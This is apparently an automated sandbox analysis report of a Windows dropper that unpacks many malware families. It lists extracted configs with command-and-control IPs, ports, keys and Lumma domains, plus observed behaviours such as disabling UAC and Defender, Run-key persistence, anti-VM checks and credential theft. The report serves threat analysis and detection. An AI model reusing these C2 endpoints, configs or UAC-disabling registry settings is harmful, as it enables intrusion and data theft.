Analysis
-
max time kernel
452s -
max time network
505s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-11-2024 00:45
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe
Resource
win11-20241007-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe
Resource
win11-20241007-en
Errors
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
xworm
5.0
104.219.239.11:6969
7UYGUkFPl0vXivrC
-
Install_directory
%AppData%
-
install_file
OneDrive.exe
Extracted
phorphiex
http://185.215.113.84
Extracted
redline
38.180.109.140:20007
Extracted
asyncrat
Shadow X RAT & HVNC 1.0.0
reWASD
sayo0w.duckdns.org:7173
2318923179jj27139792813j721983j7213987j98213j97823j789213j978213j978j12391239j913278321
-
delay
1
-
install
true
-
install_file
svchost.exe
-
install_folder
C:\WIndows
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
85.198.108.36:7667
egghlcckqridunl
-
delay
6
-
install
false
-
install_folder
%Temp%
Extracted
redline
Diamotrix
176.111.174.140:1912
Extracted
lumma
https://scriptyprefej.store
https://navygenerayk.store
https://founpiuer.store
https://necklacedmny.store
https://thumbystriw.store
https://fadehairucw.store
https://crisiwarny.store
https://presticitpo.store
https://preside-comforter.sbs
https://savvy-steereo.sbs
https://copper-replace.sbs
https://record-envyp.sbs
https://slam-whipp.sbs
https://wrench-creter.sbs
https://looky-marked.sbs
https://plastic-mitten.sbs
https://hallowed-noisy.sbs
Signatures
-
Asyncrat family
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/2204-1234-0x000001A600490000-0x000001A60049E000-memory.dmp disable_win_def -
Detect Xworm Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2204-1161-0x000001A67E1C0000-0x000001A67E1EC000-memory.dmp family_xworm behavioral1/files/0x0005000000025cc6-1197.dat family_xworm behavioral1/memory/2232-1204-0x0000000000580000-0x00000000005A8000-memory.dmp family_xworm -
Detects ZharkBot payload 1 IoCs
ZharkBot is a botnet written C++.
Processes:
resource yara_rule behavioral1/files/0x001d00000002aac5-4096.dat zharkcore -
Lokibot family
-
Lumma family
-
Njrat family
-
Phorphiex family
-
Phorphiex payload 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x000c000000025c85-1212.dat family_phorphiex -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3800 1532 cmd.exe 93 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
Processes:
resource yara_rule behavioral1/files/0x0003000000000695-2425.dat family_redline behavioral1/memory/236-2432-0x0000000000BD0000-0x0000000000C22000-memory.dmp family_redline behavioral1/files/0x001d00000002aa5a-2663.dat family_redline behavioral1/memory/4848-2668-0x0000000000540000-0x0000000000592000-memory.dmp family_redline behavioral1/files/0x001c00000002ad26-7437.dat family_redline -
Redline family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2204-1233-0x000001A600000000-0x000001A600120000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs
Processes:
Updater.vbs.exe2066210983.exewinupsecvmgr.exepowershell.EXET3.exesvchost.exedescription pid Process procid_target PID 1108 created 3240 1108 Updater.vbs.exe 52 PID 4744 created 3240 4744 2066210983.exe 52 PID 4744 created 3240 4744 2066210983.exe 52 PID 4412 created 3240 4412 winupsecvmgr.exe 52 PID 4412 created 3240 4412 winupsecvmgr.exe 52 PID 4412 created 3240 4412 winupsecvmgr.exe 52 PID 5356 created 636 5356 powershell.EXE 5 PID 2484 created 3240 2484 T3.exe 52 PID 2484 created 3240 2484 T3.exe 52 PID 2484 created 3240 2484 T3.exe 52 PID 2484 created 3240 2484 T3.exe 52 PID 2484 created 3240 2484 T3.exe 52 PID 2484 created 3240 2484 T3.exe 52 PID 2484 created 3240 2484 T3.exe 52 PID 2484 created 3240 2484 T3.exe 52 PID 1448 created 6260 1448 svchost.exe 280 -
Processes:
reg.exereg.exereg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
Xworm family
-
Zharkbot family
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x000400000000ef7a-2464.dat family_asyncrat behavioral1/files/0x001900000002ad5c-7730.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
Client_protected.exerandom.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Client_protected.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 129 2392 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepid Process 5072 powershell.exe 3532 powershell.exe 5356 powershell.EXE 6644 powershell.exe 2116 powershell.exe 2392 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 1564 netsh.exe 6288 netsh.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
A potential corporate email address has been identified in the URL: abistal_640.gif@webp
-
A potential corporate email address has been identified in the URL: anna_is_back_640.gif@webp
-
A potential corporate email address has been identified in the URL: bellaanderson_640.gif@webp
-
A potential corporate email address has been identified in the URL: bonnbonnet_640.gif@webp
-
A potential corporate email address has been identified in the URL: britanyroa_640.gif@webp
-
A potential corporate email address has been identified in the URL: ciararose_640.gif@webp
-
A potential corporate email address has been identified in the URL: cum_inmyass_640.gif@webp
-
A potential corporate email address has been identified in the URL: danamorgan_640.gif@webp
-
A potential corporate email address has been identified in the URL: deliciousdeea_640.gif@webp
-
A potential corporate email address has been identified in the URL: emamonroe_640.gif@webp
-
A potential corporate email address has been identified in the URL: emma_shy_640.gif@webp
-
A potential corporate email address has been identified in the URL: giannacoll_640.gif@webp
-
A potential corporate email address has been identified in the URL: good_girl_kate_640.gif@webp
-
A potential corporate email address has been identified in the URL: grettabrown_640.gif@webp
-
A potential corporate email address has been identified in the URL: hilaryrhodes_640.gif@webp
-
A potential corporate email address has been identified in the URL: [email protected]
-
A potential corporate email address has been identified in the URL: honmary_640.gif@webp
-
A potential corporate email address has been identified in the URL: isabelacarter_640.gif@webp
-
A potential corporate email address has been identified in the URL: isabellaeva_640.gif@webp
-
A potential corporate email address has been identified in the URL: janetstone_640.gif@webp
-
A potential corporate email address has been identified in the URL: julietawolff_640.gif@webp
-
A potential corporate email address has been identified in the URL: karlarati_640.gif@webp
-
A potential corporate email address has been identified in the URL: kendallsmiith_640.gif@webp
-
A potential corporate email address has been identified in the URL: kendhalllee_640.gif@webp
-
A potential corporate email address has been identified in the URL: khlo_velbet_640.gif@webp
-
A potential corporate email address has been identified in the URL: lauranoa_640.gif@webp
-
A potential corporate email address has been identified in the URL: lexykeen_640.gif@webp
-
A potential corporate email address has been identified in the URL: liacathaleya_640.gif@webp
-
A potential corporate email address has been identified in the URL: liliyamoon_640.gif@webp
-
A potential corporate email address has been identified in the URL: lilly_tyler_640.gif@webp
-
A potential corporate email address has been identified in the URL: louisechane_640.gif@webp
-
A potential corporate email address has been identified in the URL: luck4u_640.gif@webp
-
A potential corporate email address has been identified in the URL: margaritakis_640.gif@webp
-
A potential corporate email address has been identified in the URL: mianeilld_640.gif@webp
-
A potential corporate email address has been identified in the URL: miragrace_640.gif@webp
-
A potential corporate email address has been identified in the URL: mssweet_640.gif@webp
-
A potential corporate email address has been identified in the URL: raiissalambert_640.gif@webp
-
A potential corporate email address has been identified in the URL: ranyah_640.gif@webp
-
A potential corporate email address has been identified in the URL: samimiller_640.gif@webp
-
A potential corporate email address has been identified in the URL: sarad_640.gif@webp
-
A potential corporate email address has been identified in the URL: scarletferer_640.gif@webp
-
A potential corporate email address has been identified in the URL: serenamoll_640.gif@webp
-
A potential corporate email address has been identified in the URL: tamarafuentes_640.gif@webp
-
A potential corporate email address has been identified in the URL: tammy_ashley_640.gif@webp
-
A potential corporate email address has been identified in the URL: tiffanycardi_640.gif@webp
-
A potential corporate email address has been identified in the URL: tinnyfoxxy_640.gif@webp
-
A potential corporate email address has been identified in the URL: vanessaxxx_640.gif@webp
-
A potential corporate email address has been identified in the URL: victoriafoxs_640.gif@webp
-
A potential corporate email address has been identified in the URL: violetgiles_640.gif@webp
-
A potential corporate email address has been identified in the URL: yviesweet_640.gif@webp
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Client_protected.exerandom.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Client_protected.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Client_protected.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe -
Drops startup file 2 IoCs
Processes:
Runtime Broker.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\603620ea0fe398ac1d9cd08d637e8563.exe Runtime Broker.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\603620ea0fe398ac1d9cd08d637e8563.exe Runtime Broker.exe -
Executes dropped EXE 64 IoCs
Processes:
RedSystem.exetest_again2.exesvhosts.exeOneDrive.exec3.exeBluescreen.exewnxddd.exetdrpl.exesysnldcvmr.exexrmcsj.exeOneDrive.exeUpdater.vbs.exe1109125257.exe2031716674.exeGoodFrag.exenjSilent.exekiyan.exesvchost.exeClient.exe2066210983.exe182506255.exesvchost.exeOneDrive.exeRuntime Broker.exewinupsecvmgr.exe786127328.exe3285315584.exe1172211728.exewinbox.exeClient_protected.exex.exeOneDrive.exetwztl.execluton.execluton.exepornhub_downloader.exePORNHU~1.EXEew.exes.exeCompleteStudio.exeCbmefxrmnv.exeOneDrive.exezts.exegvndxfghs.exegvndxfghs.exegvndxfghs.exegvndxfghs.exektyhpldea.exenewtpp.exeZinTask.exeKB824105-x86-ENU.exeNoEscape.exeCbmefxrmnv.exeNework.exeHkbsse.exeHkbsse.exeOneDrive.exetest10-29.exem.exePapercut.Smtp.Setup.exePapercut.Smtp.Setup.exeGuide2018.exeT3.exerandom.exepid Process 432 RedSystem.exe 2876 test_again2.exe 664 svhosts.exe 2204 OneDrive.exe 2808 c3.exe 4624 Bluescreen.exe 2232 wnxddd.exe 3076 tdrpl.exe 3160 sysnldcvmr.exe 4948 xrmcsj.exe 3140 OneDrive.exe 1108 Updater.vbs.exe 1708 1109125257.exe 908 2031716674.exe 4304 GoodFrag.exe 3592 njSilent.exe 236 kiyan.exe 1656 svchost.exe 3996 Client.exe 4744 2066210983.exe 3556 182506255.exe 3932 svchost.exe 3640 OneDrive.exe 464 Runtime Broker.exe 4412 winupsecvmgr.exe 1908 786127328.exe 1728 3285315584.exe 4968 1172211728.exe 1680 winbox.exe 4760 Client_protected.exe 4848 x.exe 5052 OneDrive.exe 1144 twztl.exe 2532 cluton.exe 2412 cluton.exe 1872 pornhub_downloader.exe 2160 PORNHU~1.EXE 440 ew.exe 4552 s.exe 1556 CompleteStudio.exe 3112 Cbmefxrmnv.exe 4532 OneDrive.exe 5612 zts.exe 6172 gvndxfghs.exe 6356 gvndxfghs.exe 6440 gvndxfghs.exe 6200 gvndxfghs.exe 6364 ktyhpldea.exe 6468 newtpp.exe 6544 ZinTask.exe 6756 KB824105-x86-ENU.exe 6896 NoEscape.exe 6584 Cbmefxrmnv.exe 3376 Nework.exe 5244 Hkbsse.exe 5156 Hkbsse.exe 5988 OneDrive.exe 7136 test10-29.exe 6068 m.exe 5092 Papercut.Smtp.Setup.exe 5580 Papercut.Smtp.Setup.exe 4104 Guide2018.exe 2484 T3.exe 5440 random.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
random.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Wine random.exe -
Loads dropped DLL 2 IoCs
Processes:
cluton.exePapercut.Smtp.Setup.exepid Process 2532 cluton.exe 5580 Papercut.Smtp.Setup.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/files/0x001c00000002ab0e-2634.dat themida behavioral1/memory/4760-2642-0x0000000000BF0000-0x000000000127E000-memory.dmp themida behavioral1/memory/4760-2643-0x0000000000BF0000-0x000000000127E000-memory.dmp themida behavioral1/memory/4760-2652-0x0000000000BF0000-0x000000000127E000-memory.dmp themida -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
cluton.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook cluton.exe Key opened \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook cluton.exe Key opened \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook cluton.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
Runtime Broker.exeCbmefxrmnv.exeOneDrive.exewnxddd.exetdrpl.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows\CurrentVersion\Run\603620ea0fe398ac1d9cd08d637e8563 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Runtime Broker.exe\" .." Runtime Broker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\603620ea0fe398ac1d9cd08d637e8563 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Runtime Broker.exe\" .." Runtime Broker.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows\CurrentVersion\Run\VolumeInfo = "C:\\Users\\Admin\\AppData\\Roaming\\VolumeInfo.exe" Cbmefxrmnv.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\documents\\OneDrive.exe" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Roaming\\OneDrive.exe" wnxddd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" tdrpl.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Client_protected.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Client_protected.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
tstory.exedescription ioc Process File opened (read-only) \??\H: tstory.exe File opened (read-only) \??\J: tstory.exe File opened (read-only) \??\N: tstory.exe File opened (read-only) \??\R: tstory.exe File opened (read-only) \??\S: tstory.exe File opened (read-only) \??\B: tstory.exe File opened (read-only) \??\E: tstory.exe File opened (read-only) \??\G: tstory.exe File opened (read-only) \??\X: tstory.exe File opened (read-only) \??\Z: tstory.exe File opened (read-only) \??\U: tstory.exe File opened (read-only) \??\V: tstory.exe File opened (read-only) \??\W: tstory.exe File opened (read-only) \??\P: tstory.exe File opened (read-only) \??\Q: tstory.exe File opened (read-only) \??\T: tstory.exe File opened (read-only) \??\K: tstory.exe File opened (read-only) \??\L: tstory.exe File opened (read-only) \??\M: tstory.exe File opened (read-only) \??\I: tstory.exe File opened (read-only) \??\O: tstory.exe File opened (read-only) \??\A: tstory.exe File opened (read-only) \??\Y: tstory.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
Processes:
flow ioc 1 raw.githubusercontent.com 44 raw.githubusercontent.com 201 raw.githubusercontent.com 364 raw.githubusercontent.com 406 raw.githubusercontent.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepid Process 7072 powercfg.exe 6380 powercfg.exe 6176 powercfg.exe 5516 powercfg.exe -
Drops file in System32 directory 3 IoCs
Processes:
h5a71wdy.exepowershell.EXEdescription ioc Process File opened for modification C:\Windows\system32\MRT.exe h5a71wdy.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
Client_protected.exektyhpldea.exerandom.exepid Process 4760 Client_protected.exe 6364 ktyhpldea.exe 5440 random.exe -
Suspicious use of SetThreadContext 13 IoCs
Processes:
svhosts.exeUpdater.vbs.exewinupsecvmgr.execluton.exeCompleteStudio.exegvndxfghs.exeCbmefxrmnv.exeh5a71wdy.exepowershell.EXET3.exedescription pid Process procid_target PID 664 set thread context of 336 664 svhosts.exe 82 PID 1108 set thread context of 1200 1108 Updater.vbs.exe 130 PID 4412 set thread context of 4064 4412 winupsecvmgr.exe 146 PID 4412 set thread context of 1492 4412 winupsecvmgr.exe 147 PID 2532 set thread context of 2412 2532 cluton.exe 158 PID 1556 set thread context of 5580 1556 CompleteStudio.exe 195 PID 6172 set thread context of 6356 6172 gvndxfghs.exe 200 PID 6172 set thread context of 6440 6172 gvndxfghs.exe 201 PID 6172 set thread context of 6200 6172 gvndxfghs.exe 202 PID 3112 set thread context of 6584 3112 Cbmefxrmnv.exe 215 PID 5816 set thread context of 6120 5816 h5a71wdy.exe 258 PID 5356 set thread context of 5892 5356 powershell.EXE 264 PID 2484 set thread context of 3696 2484 T3.exe 274 -
Processes:
resource yara_rule behavioral1/files/0x001900000002ab0d-2623.dat upx behavioral1/memory/1680-2627-0x0000000000400000-0x0000000000422000-memory.dmp upx behavioral1/memory/1680-2647-0x0000000000400000-0x0000000000422000-memory.dmp upx -
Drops file in Windows directory 5 IoCs
Processes:
svchost.exeClient.exeNework.exetdrpl.exedescription ioc Process File created C:\Windows\Client.exe svchost.exe File created C:\WIndows\svchost.exe Client.exe File created C:\Windows\Tasks\Hkbsse.job Nework.exe File created C:\Windows\sysnldcvmr.exe tdrpl.exe File opened for modification C:\Windows\sysnldcvmr.exe tdrpl.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid Process 6088 sc.exe 3684 sc.exe 6800 sc.exe 6780 sc.exe 3224 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 8 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 4848 432 WerFault.exe 78 4104 432 WerFault.exe 78 2568 4760 WerFault.exe 151 6128 5612 WerFault.exe 196 6296 6440 WerFault.exe 201 6636 6544 WerFault.exe 207 6412 3536 WerFault.exe 287 6420 6372 WerFault.exe 294 -
System Location Discovery: System Language Discovery 1 TTPs 48 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exetwztl.exePORNHU~1.EXENework.exeInstallSetup.exe4363463463464363463463463.exeRedSystem.exenjSilent.exesvchost.exex.exerandom.exesvhosts.exetdrpl.exe2031716674.exePapercut.Smtp.Setup.exeGuide2018.exeRuntime Broker.exe1172211728.exewinbox.exeZinTask.exem.exesvchost.exekiyan.exes.exegvndxfghs.execmd.exenet.exeHkbsse.exePapercut.Smtp.Setup.exesysnldcvmr.exeRegAsm.exenewtpp.exeNoEscape.exe182506255.exeew.exektyhpldea.exepornhub_downloader.exeCbmefxrmnv.exeKB824105-x86-ENU.exedsd.exenetsh.exe3285315584.execluton.exeClient_protected.exezts.exeRegAsm.exeGoodFrag.exe786127328.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language twztl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PORNHU~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Nework.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RedSystem.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language njSilent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svhosts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tdrpl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2031716674.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Papercut.Smtp.Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Guide2018.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Runtime Broker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1172211728.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winbox.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ZinTask.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kiyan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvndxfghs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hkbsse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Papercut.Smtp.Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language newtpp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NoEscape.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 182506255.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ktyhpldea.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pornhub_downloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cbmefxrmnv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KB824105-x86-ENU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dsd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3285315584.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cluton.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client_protected.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GoodFrag.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 786127328.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
-
NSIS installer 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x001b00000002ab1c-2707.dat nsis_installer_1 behavioral1/files/0x001b00000002ab1c-2707.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exeGuide2018.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Guide2018.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Guide2018.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid Process 4968 timeout.exe 3252 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 58 IoCs
Processes:
